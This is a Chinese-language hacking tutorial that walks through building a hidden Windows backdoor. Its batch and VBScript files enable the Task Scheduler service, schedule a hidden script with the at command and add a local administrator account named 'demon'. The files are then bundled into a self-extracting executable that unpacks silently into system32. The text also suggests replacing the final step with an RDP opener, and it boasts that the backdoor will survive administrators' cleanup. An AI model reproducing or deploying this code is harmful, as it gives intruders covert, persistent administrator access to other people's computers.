各位是否记得IPC$漏洞时用到的一个命令? 没错,它就是at命令,其功能是在定时的时间内完成指定操作,而今天我们可以用它来做个一个隐蔽的后门程序。后门的功能就是在指定的时间创建一个系统用户。

at命令事实上对应了一个服务,名叫schedule服务,在services中我们可以找到一个task scheduler的服务名称,这就是它所对应的服务了,但是在普遍情况下此服务时禁用的,我们要做的第一个操作就是开启这项服务。

这个后门程序是一个自解压缩文件, 其实是由4个文件构成, 分别为a.vbs 、a.bat 、b.vbs、b.bat,这四个文件我们再用来合成一个自解压缩文件。4个文件代码其实很简单,我直接贴出:
// a.bat:
@echo off
@sc config schedule start= auto
@sc start schedule
ping 127.1
at time /interactive %systemroot%\system32\b.vbs
//time是自定义的时间,如 6:30

// a.vbs:
set ws=wscript.createobject("wscript.shell")
ws.run "a.bat",0
wscript.sleep 10000

// b.bat:
@echo off
@net user demon demon /add
@net localgroup administrators demon /add

//b.vbs:
set ws=wscript.createobject("wscript.shell")
ws.run "b.bat",0
wscript.sleep 10000

  我们把四个文件一次合成为一个自解压缩文件,解压路径为 system32 目录,解压后运行a.vbs 其他选项设置为隐藏即可。
生成一个test.exe就是一个后门程序了,我们来看下流程,运行test.exe 文件将会解压到system32目录,紧接着运行a.vbs,a.vbs又是以隐藏模式运行a.bat,a.bat 设置了指定时间运行b.vbs , 当到了指定时间后,b.vbs运行,b.vbs又是以隐藏模式执行b.bat,这样就神不知鬼不觉的添加了个系统账户,其实B.BAT我们可以换成一个自开3389或者是类似的后门工具。这样就不怕管理员删除我们的后门程序了,因为当在指定时间,又会执行一次后门程序。